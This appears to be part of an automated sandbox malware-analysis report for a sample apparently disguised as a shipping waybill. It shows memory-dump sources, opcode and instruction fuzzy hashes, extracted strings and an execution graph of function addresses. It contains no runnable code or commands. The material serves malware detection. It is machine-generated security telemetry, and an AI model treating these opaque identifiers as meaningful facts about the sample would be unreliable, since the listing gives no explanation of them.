                                                • Opcode Fuzzy Hash: 7beea889038731cec0a699a156fe0e06747146b487e3dc62d94d472e3cf25734
                                                • Instruction Fuzzy Hash: FBB012B71E4200E28D40A7B8498882BF751FBF6B00F509C39730681018CC60C875EA2F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd687011453c2ab66db2d53a1d44f9eb508269f452bd2ac2347c9fbd33ac12e5
                                                • Instruction ID: f8ee326420d8a70108ba8e4efa453f6b0389698648763f16d560d5619af880f7
                                                • Opcode Fuzzy Hash: fd687011453c2ab66db2d53a1d44f9eb508269f452bd2ac2347c9fbd33ac12e5
                                                • Instruction Fuzzy Hash: 5BB092312210418ACE42CF04EE80564B361D6C02047419220840457A14CB7CAC889A41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ce77d4750224fcb85bdd3f05fe7adec2275abff056d113d3da51804fb549b8b
                                                • Instruction ID: 4442d4c0cb7b09600e570fabe02708ca529b5e7c372915c99d5770ac27cd1a3c
                                                • Opcode Fuzzy Hash: 8ce77d4750224fcb85bdd3f05fe7adec2275abff056d113d3da51804fb549b8b
                                                • Instruction Fuzzy Hash: DBA002146EA01782CC0477ECC5D807D9819FA95F1AFC1DF959513D511DCC0E8646C12E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 7Z/t$RWIK$[[bb
                                                • API String ID: 0-1157992699
                                                • Opcode ID: 08819267d2f7231752767be2b1a1227e4831db44fc8210ce3e11ac81f0050117
                                                • Instruction ID: 06b03630febba12cc6feb70b21a5b79b358ae4d121b1dc7329e5bdbec9947a73
                                                • Opcode Fuzzy Hash: 08819267d2f7231752767be2b1a1227e4831db44fc8210ce3e11ac81f0050117
                                                • Instruction Fuzzy Hash: 775128B0E1560ACFCB48CFAAC4455AEFBF2BF8A310F14D42AD419A7254D7349A428F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHkq$PHkq
                                                • API String ID: 0-119726883
                                                • Opcode ID: 8a53680f00daadaf373f6288e4c1c018ec7ed2ac86be3b4d4ce93c066cb545b8
                                                • Instruction ID: 961dee439873cf7a9932f35fccc472bb3c4c453dfe984356561540afbe5c2696
                                                • Opcode Fuzzy Hash: 8a53680f00daadaf373f6288e4c1c018ec7ed2ac86be3b4d4ce93c066cb545b8
                                                • Instruction Fuzzy Hash: BFD1E3B4A10205CFDB58DF69C598AA9B7F1BF4C305F6580A9E406AB771DB31AD40CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 40a3faadceb31d6c8eb7d1663a95459f0f56d20f157d80bc405060dcf221d7e3
                                                • Instruction ID: 17ff09b2fe1194f454853ee19d23b89e17b59cb93ec29d3a56e4d023d4d8134d
                                                • Opcode Fuzzy Hash: 40a3faadceb31d6c8eb7d1663a95459f0f56d20f157d80bc405060dcf221d7e3
                                                • Instruction Fuzzy Hash: 2221DBB1E116189BEB58CFABD84079EFBF7AFC8200F14C07AD508A6254EB345A458F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 243e2bdac6944aa37beb71ffbdb252d3225072d0553c37a65cd5a7a626500a15
                                                • Instruction ID: 086d4a7d1b3f3e670ec02a4f8bdecb9ac0896c1a1d9a7ba62d333c30ab02c7eb
                                                • Opcode Fuzzy Hash: 243e2bdac6944aa37beb71ffbdb252d3225072d0553c37a65cd5a7a626500a15
                                                • Instruction Fuzzy Hash: 88E119B4E002598FCB54DFA9C5849AEFBB2FF89304F248169E414AB356D734AD41CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cf2bac28ad2890585af121940724df65b34f02b5bd5eb69aea8364929c34587
                                                • Instruction ID: eee4b0248a9156e0c6a624e979d8a519c8aab4a74a2e1812c376d03e091ca84b
                                                • Opcode Fuzzy Hash: 5cf2bac28ad2890585af121940724df65b34f02b5bd5eb69aea8364929c34587
                                                • Instruction Fuzzy Hash: 5612A5B0DC17458AD752DF66E94C18B3BB2BB82319FD04B09D2612B2E5D7B811EACF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b92b943c01b039657ef42ae144b0fa5030fdba71d66e93c1fad37e177b5b21c8
                                                • Instruction ID: c6dd1506eb3d0b398873715229203ad2f903c4f3a7782d052226eada8ac0f84a
                                                • Opcode Fuzzy Hash: b92b943c01b039657ef42ae144b0fa5030fdba71d66e93c1fad37e177b5b21c8
                                                • Instruction Fuzzy Hash: B0E1FAB4E002198FCB54DFA9D5809AEFBB2FF89304F248169E414AB356D774AE41CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a5e9156842d612088ea2d40fd575389fdce3849249588766369cd05458620b8
                                                • Instruction ID: 80534314130a344cba0f3a34456003b5a5ebcd9af3cf7cd47d81201bfc5efb1b
                                                • Opcode Fuzzy Hash: 2a5e9156842d612088ea2d40fd575389fdce3849249588766369cd05458620b8
                                                • Instruction Fuzzy Hash: 35E1FAB4E002598FCB54DFA9C5809AEFBB2FF89304F249169E415AB356D734AD42CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7dc2d57965075a0a66cb243ce2ba57c666fc482a743280f08a742319c6892fbd
                                                • Instruction ID: 7bfd46d72dc5862a2fcd9308735d960f3be667ae4838e3cdab5de7eb368e70d8
                                                • Opcode Fuzzy Hash: 7dc2d57965075a0a66cb243ce2ba57c666fc482a743280f08a742319c6892fbd
                                                • Instruction Fuzzy Hash: DDE1E9B4E002598FCB54DFA9C5809AEFBB2FF89304F249169E414AB356D735AD41CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6915f29dcae78e1f5438b969c935f027b42ce3d539b8b1f5476f2b5b9a7b7bcb
                                                • Instruction ID: c867ad0e86c825ab3e5bd7a0bd0c708a9d8fdb31ad99024dbb1ed9af40dbf8ea
                                                • Opcode Fuzzy Hash: 6915f29dcae78e1f5438b969c935f027b42ce3d539b8b1f5476f2b5b9a7b7bcb
                                                • Instruction Fuzzy Hash: 30E1FAB4E0125A8FCB54DFA9C5809AEFBB2FF89304F248169E414AB355D735AE41CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ccf7b4de5a49bfa55620a424bd8290c667ea4e640b270ea72b64895ef6a4c4a
                                                • Instruction ID: 6e95ff415ad02892bb7a9fdcbdcd8cafe054881ee3dab45e48c9eed0bcafc15f
                                                • Opcode Fuzzy Hash: 5ccf7b4de5a49bfa55620a424bd8290c667ea4e640b270ea72b64895ef6a4c4a
                                                • Instruction Fuzzy Hash: 36D1D73592075ACACB10EF64D990AADF771FF95300F50C7AAE10977224EB74AAC9CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b34ea29933c8bcfb3bef76f596b2b72dcba80ac57ee5c754b207012eee56219b
                                                • Instruction ID: 3e5df4488b4dfc6fb7d0e806581f98494eaa476e4355901ee195b39377df77f5
                                                • Opcode Fuzzy Hash: b34ea29933c8bcfb3bef76f596b2b72dcba80ac57ee5c754b207012eee56219b
                                                • Instruction Fuzzy Hash: 8FA17D32E10209CFCF15DFB5C8945AEB7B2FF85300B15856AE906AB2A1EB31E955CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 594f053e356d6f66ac05edb6bc62f78d106fa8e814b685b322f7a975f46c9c70
                                                • Instruction ID: d609f472b3d45283b12201beef582b2b31dd30de2cc44efbe2132016f4d0636c
                                                • Opcode Fuzzy Hash: 594f053e356d6f66ac05edb6bc62f78d106fa8e814b685b322f7a975f46c9c70
                                                • Instruction Fuzzy Hash: 7DC12AB0DC0745CAD712DF66E94818B3BB2BB86315FE04B19D2616B2E0DBB414EACF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74d0ebc159cce38c52eae47fd68678eac2d238f7a72eb858af49dd083ac9ff82
                                                • Instruction ID: 11447ecefe42d19f4570ca9927c9ee3b3cc68800c59e4cc1c341559bd737ea53
                                                • Opcode Fuzzy Hash: 74d0ebc159cce38c52eae47fd68678eac2d238f7a72eb858af49dd083ac9ff82
                                                • Instruction Fuzzy Hash: F481B1B4E14219CFCB44CFAAC58499EFBF2FF89210F14956AD415AB320D734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 626dea25b58d46088dea87978d9a7b9d37b2996c1ebb2dc9ef4ce6c9d8795bdd
                                                • Instruction ID: 3e0baf81bbb43da1c1ae1f62f8d31661c7710f112104752905dfe26965fab2e7
                                                • Opcode Fuzzy Hash: 626dea25b58d46088dea87978d9a7b9d37b2996c1ebb2dc9ef4ce6c9d8795bdd
                                                • Instruction Fuzzy Hash: 947128B5E1120ADBCB44CF9AD4849EEFBF2FB89310F148425E415AB354C3349A81CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed77da2911a2944074ac44efbf23dbdac7a3e59d4403febb560b6391b7d3d276
                                                • Instruction ID: 1c5db7fc077754c2c6c9a9af2a556dbf327368e172b8164b882de6c0246f47d4
                                                • Opcode Fuzzy Hash: ed77da2911a2944074ac44efbf23dbdac7a3e59d4403febb560b6391b7d3d276
                                                • Instruction Fuzzy Hash: A7619AB0935A0DEBCB44CFA5F18A66DBFB2FB89310F2094A5D08597194DB348665CB14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c65f70c575ca8953f9e369193fc86e0fdca40c7aa13d2299538651d3c0243f9
                                                • Instruction ID: 72d828f03214c63dae00220eacd5ad3cc4b9c880d10e21b413455d2e0f26de68
                                                • Opcode Fuzzy Hash: 0c65f70c575ca8953f9e369193fc86e0fdca40c7aa13d2299538651d3c0243f9
                                                • Instruction Fuzzy Hash: 416103B0E1120AEBCF44CFAAD5855EEFBB2FF89200F14806AD415B7214D734AA418F95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ff8516a3959350db8825e5515dd95c70142aee1412c1bbc9fd5add2e9052339
                                                • Instruction ID: 9a48bbb8c0e00419db622bad9427aa8d4cdf7f79efb3410eb4764c58421d62e0
                                                • Opcode Fuzzy Hash: 4ff8516a3959350db8825e5515dd95c70142aee1412c1bbc9fd5add2e9052339
                                                • Instruction Fuzzy Hash: 24513BB0E1520ACBCF44DFAAD4855AEFBF2BF89310F10942AE416B7354DB345A428F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 186e0eaa188ab79c202f8c971b75e68df5d3caac87f5626c245f59fe59b5f0b4
                                                • Instruction ID: 48373167db4d7f8c734828974b83a0db1ce85a5327bbd264dbc7500309f0dcc5
                                                • Opcode Fuzzy Hash: 186e0eaa188ab79c202f8c971b75e68df5d3caac87f5626c245f59fe59b5f0b4
                                                • Instruction Fuzzy Hash: AE4183B1D056588FEB5DCF6B8C512CAFBF3AFC5210F08C1BAC418AB255DA3509468F55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 74fb58e7dc8c68c7f57698134fea2df0ee1da703286c6f6b51a65dc6e07de818
                                                • Instruction ID: c7c36ce7fca6ede865694a7354bdb58d1d5f6c6532707e9fcf15d5b2c26a2186
                                                • Opcode Fuzzy Hash: 74fb58e7dc8c68c7f57698134fea2df0ee1da703286c6f6b51a65dc6e07de818
                                                • Instruction Fuzzy Hash: BD415FB1D016198BEB5CCF6B8D4469EFBF3AFC9301F18C1BA941CAA254EB3405968F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fefeacb8d0db2613f745156fe6822224b9d14d2e32f7650c25f869a33278ac9a
                                                • Instruction ID: 56eecdd505a5bfcaa725f4e3256f7cf1344663f3756b3a183779faa1032d8b37
                                                • Opcode Fuzzy Hash: fefeacb8d0db2613f745156fe6822224b9d14d2e32f7650c25f869a33278ac9a
                                                • Instruction Fuzzy Hash: 5C41D2B1E0020AEBDF48CFAAD4855AEFBF2BF89300F24D12AD415A7214D7349A51CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:31.2%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:4.4%
                                                Total number of Nodes:1846
                                                Total number of Limit Nodes:93
                                                execution_graph 9703 40c640 9730 404bee 9703->9730 9706 40c70f 9707 404bee 6 API calls 9708 40c66b 9707->9708 9709 404bee 6 API calls 9708->9709 9715 40c708 9708->9715 9712 40c683 9709->9712 9710 402bab 2 API calls 9710->9706 9711 40c701 9714 402bab 2 API calls 9711->9714 9712->9711 9713 404bee 6 API calls 9712->9713 9718 40c694 9713->9718 9714->9715 9715->9710 9716 40c6f8 9717 402bab 2 API calls 9716->9717 9717->9711 9718->9716 9737 40c522 9718->9737 9720 40c6a9 9721 40c6ef 9720->9721 9723 405872 4 API calls 9720->9723 9722 402bab 2 API calls 9721->9722 9722->9716 9724 40c6c5 9723->9724 9725 405872 4 API calls 9724->9725 9726 40c6d5 9725->9726 9727 405872 4 API calls 9726->9727 9728 40c6e7 9727->9728 9729 402bab 2 API calls 9728->9729 9729->9721 9731 402b7c 2 API calls 9730->9731 9732 404bff 9731->9732 9733 404c3b 9732->9733 9734 4031e5 4 API calls 9732->9734 9733->9706 9733->9707 9735 404c28 9734->9735 9735->9733 9736 402bab 2 API calls 9735->9736 9736->9733 9738 402b7c 2 API calls 9737->9738 9739 40c542 9738->9739 9739->9720 9740 405941 9741 4031e5 4 API calls 9740->9741 9742 405954 9741->9742 8307 409046 8320 413b28 8307->8320 8309 40906d 8311 405b6f 6 API calls 8309->8311 8310 40904e 8310->8309 8312 403fbf 7 API calls 8310->8312 8313 40907c 8311->8313 8312->8309 8314 409092 8313->8314 8324 409408 8313->8324 8316 4090a3 8314->8316 8319 402bab 2 API calls 8314->8319 8318 402bab 2 API calls 8318->8314 8319->8316 8321 413b31 8320->8321 8322 413b38 8320->8322 8323 404056 6 API calls 8321->8323 8322->8310 8323->8322 8325 409413 8324->8325 8326 40908c 8325->8326 8338 409d36 8325->8338 8326->8318 8337 40945c 8444 40a35d 8337->8444 8339 409d43 8338->8339 8340 40a35d 4 API calls 8339->8340 8341 409d55 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409d8b 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409dd0 8344->8345 8346 405b6f 6 API calls 8345->8346 8377 409423 8345->8377 8349 409df7 8346->8349 8347 409e1c 8348 4031e5 4 API calls 8347->8348 8347->8377 8350 409e62 8348->8350 8349->8347 8351 402bab 2 API calls 8349->8351 8352 4031e5 4 API calls 8350->8352 8351->8347 8353 409e82 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409ea2 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409ec2 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ee2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409f02 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409f22 8362->8363 8364 4031e5 4 API calls 8363->8364 8367 409f42 8364->8367 8365 40a19b 8366 408b2c 4 API calls 8365->8366 8366->8377 8367->8365 8368 409fa3 8367->8368 8369 405b6f 6 API calls 8368->8369 8368->8377 8370 409fbd 8369->8370 8371 40a02c 8370->8371 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8399 40a16d 8371->8399 8375 409fd7 8372->8375 8376 40a070 8373->8376 8374 402bab 2 API calls 8374->8377 8378 405b6f 6 API calls 8375->8378 8379 4031e5 4 API calls 8376->8379 8377->8337 8400 4056bf 8377->8400 8381 409fe5 8378->8381 8380 40a090 8379->8380 8382 4031e5 4 API calls 8380->8382 8381->8371 8383 402bab 2 API calls 8381->8383 8384 40a0b0 8382->8384 8385 409fff 8383->8385 8388 4031e5 4 API calls 8384->8388 8386 405b6f 6 API calls 8385->8386 8387 40a00d 8386->8387 8387->8371 8390 40a021 8387->8390 8389 40a0d0 8388->8389 8392 4031e5 4 API calls 8389->8392 8391 402bab 2 API calls 8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 